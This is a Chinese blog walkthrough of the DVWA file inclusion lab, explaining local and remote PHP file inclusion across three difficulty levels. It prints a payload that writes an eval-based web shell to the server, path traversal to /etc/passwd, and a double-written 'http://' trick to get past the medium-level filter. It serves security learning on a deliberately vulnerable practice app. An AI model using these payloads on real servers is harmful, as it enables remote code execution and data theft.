dvwa之File inclusion

最新推荐文章于 2024-10-03 17:08:59 发布
最新推荐文章于 2024-10-03 17:08:59 发布
阅读量73 收藏
点赞数
文章标签: php 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ANDTM/article/details/130728293
版权
文章详细介绍了PHP文件包含漏洞的概念,包括本地文件包含和远程文件包含,以及如何利用allow_url_include和allow_url_fopen选项进行攻击。还提到了防御措施,如修改配置文件和过滤恶意字符串,并举例说明了一句话木马的创建和利用过程。
摘要由CSDN通过智能技术生成

相关知识

文件包含是指程序员把后期要重复使用的代码函数放到一个文件中,当后期要使用时只需要调用此文件就可以,不用再重新编写代码。

File Inclusion,文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
require():可以包含文件,如果包含错了,直接报错并退出程序的执行
include():在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行
require_once():与require类似,区别在于当重复调用同一文件时,程序只调用一次
include_once():与include类似,区别在于当重复调用同一文件时,程序只调用一次

文件包含漏洞分为两种类型,一种是本地文件包含,一种是远程文件包含。

本地文件包含就是在服务器A中,通过漏洞可以调用打开我们电脑中任意文件,我们可以通过A服务器的网站远程打开并执行我们电脑上的文件,该文件可以任意构造,甚至我们可以在该服务器A的根目录下创建一个php文件,里面是用PHP语言构造的一句话木马,一旦执行我们就可以通过菜刀远程连接A服务器,任意操作其文件。

远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。通过此漏洞,我们可以通过A服务器的网站远程打开并执行任意服务器B上的文件,甚至可以访问服务器A中的任意文件,只要知道它的IP就行,远程访问需要借助Http协议,这种漏洞会造成服务器信息泄露,通过文件包含查看服务器的所有内容,甚至包括里边的用户,密码文件等等。

低级

在打靶场之前,我们要先对配置文件进行更改,打开配置文件中的allow_url_fopen,allow_url_include选项,目的是为了进行后期的远程文件包含,具体操作如下:

开始会提示配置文件中的某些选项未打开
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述进行完这操作后,界面就不会在报错了在这里插入图片描述
查看源码
在这里插入图片描述通过get传参把我们上传的文件进行上传,没有任何过滤措施,当我们点击file1时,网站的url就会变化如下图所示:在这里插入图片描述我们可以更改它所传的参数,可以通过相对路径,用多个…/让目录返回上一级,然后再进入目标目录,如…/…/…/…/…/etc/passwdd在这里插入图片描述网站的警告会让我们知道服务里上传文件的路径,甚至可以知道PHP的各种信息通过输入page=…/…/phpinfo.php在这里插入图片描述靶场的服务器我们视为服务器A,我们的电脑我们视为服务器B,我们在我们的电脑上创建一个txt文件(text文件会被服务器用PHP进行识别),里面的内容为

下面展示一些 内联代码片


<?php fputs(fopen("dvwainclusion.php","w"),"<?php @eval(\$_POST[123]);?>");?>

此代码的意思是在该文件上传路径中创建一个php文件,内容为<?php @eval(\$_POST[123]);?>");?>
这个内容就是一句话木马的PHP 编写,然后我们包含我们的txt文件
在这里插入图片描述防火墙开启会提醒,我们先允许,然后我们的文件路径下面就多了一个一句话木马文件在这里插入图片描述之后我们可以包含此木马文件,跟上面的本地文件包含一样,后面就可以通过菜刀连接服务器,想干嘛干嘛,菜刀的使用就先不多说了。

以上是本地文件包含,我们也可以尝试远程文件包含,远程文件包含需要用到http协议,即我们远程包含某个服务器上的文件如page=http://11.20.011.06/phpinfo.txt,11.20.011.06为服务器IP (我随便打的)

中级

查看源码:在这里插入图片描述相比低级多了对http://, https://,…/, …\的过滤,也就是我们打开的文件路径不能包括这些字符串,http://是用于向服务器根目录进行访问的时候会用到,比如根目录有一个phpinfo.txt文件完后服务器的地址是11.20.011.06(随便输的),我们就可以让page=http://11.20.011.06/phpinfo.txt,来访问此文件

应对以上过滤的办法就通过双写,如page=http://11.20.011.06/phpinfo.txt我们可以写成page=hthttp://tp://11.20.011.06/phpinfo.txt,前面的http://过滤完剩下的字符串又刚好拼接成http://,其余操作同LOW级

高级

查看源码在这里插入图片描述fnmatch() 函数根据指定的模式来匹配文件名或字符串。源码中限制了文件名来防止恶意文件包含,并且!fnmatch( “file*”, $file )代码使用了fnmatch函数检查page参数,要求page参数的开头必须是file,服务器才会去包含相应的文件,这样我们就远程访问不了了。

这里我们可以用到本地文件传输协议,File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。所有的路径格式都为file:///文件路径
在这里插入图片描述远程访问要用到Http协议,所以有file://的前缀时候不能进行远程访问。

纳纳乌
关注
DVWAFile Inclusion
baynk的博客
10-29 880
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ File...
dvwaFile Inclusion
Alsn86的博客
02-04 757
dvwaFile Inclusion 进行包含的文件名由get方法的page参数传递 看一下包含的流程吧 index.php <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page =
DVWAFile Inclusion
chtdgf的博客
02-23 151
DVWAFile Inclusion 1.LOW级别 1.PHP代码分析 我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 服务器获取 page 的值,没有进行任何过滤。 二 MEDIUM级别 1.PHP代码分析 我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file
DVWAFile Inclusion
weixin_42075643的博客
02-18 103
学习基础文件上传 low level 查看源代码: <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 可以看到代码没有任何限制过滤,可以任意包含文件… 首先随便写个包含文件: http://localhost/DVWA/vulnerabilities/fi/?page=111.php 直接报出了网站路径。。。 需要说明的是:不管文件后缀是否是php,都会当做php文件执行,如果文件内容确认为php,.
DVWAFile Inclusion(文件包含)
RexHa的博客
10-01 1252
dvwa 文本包含漏洞的解析
[网络安全]DVWAFile Inclusion攻击姿势及解题详析合集
等风来
05-03 9423
如果 $file 不以 file 开头且不等于 include.php,则说明用户请求的不是目标文件,因此输出错误信息并调用 exit() 函数,结束程序执行。双写绕过是一种常见的绕过字符过滤规则的方法,其原理是将需要过滤的字符在 URL 中双倍输入,从而绕过简单的过滤器。它可以在字符串中查找并替换指定的内容,返回替换后的新字符串。subject 参数指定要进行替换操作的原始字符串,可以是一个字符串或者一个字符串数组;其中,search 参数指定要查找的字符串,可以是一个字符串或者一个字符串数组;
DVWA 靶场 File Inclusion 通关解析
Flag少侠的博客
06-27 8664
文件包含(File Inclusion)攻击是一种通过将文件内容包含到应用程序中执行,从而实现恶意行为的攻击方式。文件包含漏洞常见于动态构建页面或加载配置文件的 Web 应用程序中,如果用户输入未经适当验证就被用来构建文件路径,攻击者可能利用这些漏洞执行任意代码或读取系统上的敏感文件。本地文件包含(Local File Inclusion,LFI):攻击者通过包含服务器上的本地文件,执行或读取文件内容。远程文件包含(Remote File Inclusion,RFI)
二、DVWAFile Inclusion
ldjzxn的博客
03-29 145
声明:文中出现的ip为练习靶场,本文仅供学习,旨在学习web安全,不允许任何侵权行为 文件包含漏洞1.文件包含漏洞原理2.文件包含漏洞渗透与防御2.1 File Inclusion(low)2.1.1本地文件包含LFI2.1.2远程文件包含RFI2.2 File Inclusion(medium)2.2.1本地文件包含LFI2.2.2远程文件包含RFI2.3File Inclusion(high) 1.文件包含漏洞原理 2.文件包含漏洞渗透与防御 2.1 File Inclusion(low) 2.1.1
DVWAFile Inclusion
qq_43665434的博客
03-01 219
DVWAFile Inclusion 一、low级别 1、测试流程 (1)local 发现文件名是通过url传递的 于是尝试更改page参数内容 替换为:..\..\..\..\..\..\..\..\password.txt 如图所示,成功爆出根目录下password.txt文件下的内容,此为本地文件包含。 (2)remote 搭建一个站点,写入一个木马文件 将page参数内容替换为木马文件的url地址 加上参数x,传入cmd命令: http://10.245.3.237/dvwa/vulner
文件包含漏洞、DVWA-File Inclusion
weixin_41487522的博客
06-30 386
文件包含漏洞 什么是文件包含漏洞? 攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。 (包含的文件会被当做脚本文件来解析) 一句话来说就是:文件包含并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 包含文件很有用,可以简化代码 文件包含分为本地和远程文件包含(需要allow_url_include=On) 本地文件包含LFI 远程文件包含RFI 函数解析 这里我们需要了解4个PHP的函数 include:使用include引用外部文件时,
靶场练习:DVWAFile Inclusion(文件包含)操作/代码解析
night7i的博客
04-15 406
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1284
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
Dvwa练习04 File Inclusion文件包含
coco3105的博客
02-09 1315
本地文件包含,远程文件包含,文件读取及代码执行
DVWA File Inclusion
部分学习记录
09-22 166
low 查看源码,没有对参数page进行过滤 构造page尝试获取相应信息:http://192.168.56.141/vulnerabilities/fi/?page=1.php 暴出了路径 利用获取到的路径继续构造,尝试获取一些配置信息 http://192.168.56.141/vulnerabilities/fi/?page=C:\phpstudy_pro\WWW\DVWA-master\php.ini 关于的Magic_quote_gpc信息(出自https://www.freebuf.com/a
【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议
最新发布
10-03 1416
在进行网络编程时,有时需要设计并实现自定义协议,以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性:协议应具有清晰的语法和语义,使开发者能快速理解和实现。扩展性:协议应允许未来的功能扩展,而不破坏现有功能。安全性:数据传输过程中应考虑加密和校验,以保证数据不被篡改。高效性:应尽可能减少网络带宽占用,提升数据传输效率。容错性:协议应能处理各种网络异常情况,如数据丢失、重复和延迟。
基于php的幸运舞蹈课程工作室管理系统
计算机学姐的博客
09-28 1032
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
PHP安装后Apache无法运行的问题
Bingyeshinvwang的博客
10-01 677
php安装之后,修改httpd.conf无法运行Apache的解决方案
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 1205
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
dvwa file inclusionfile upload
05-12
其中包括文件包含(File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值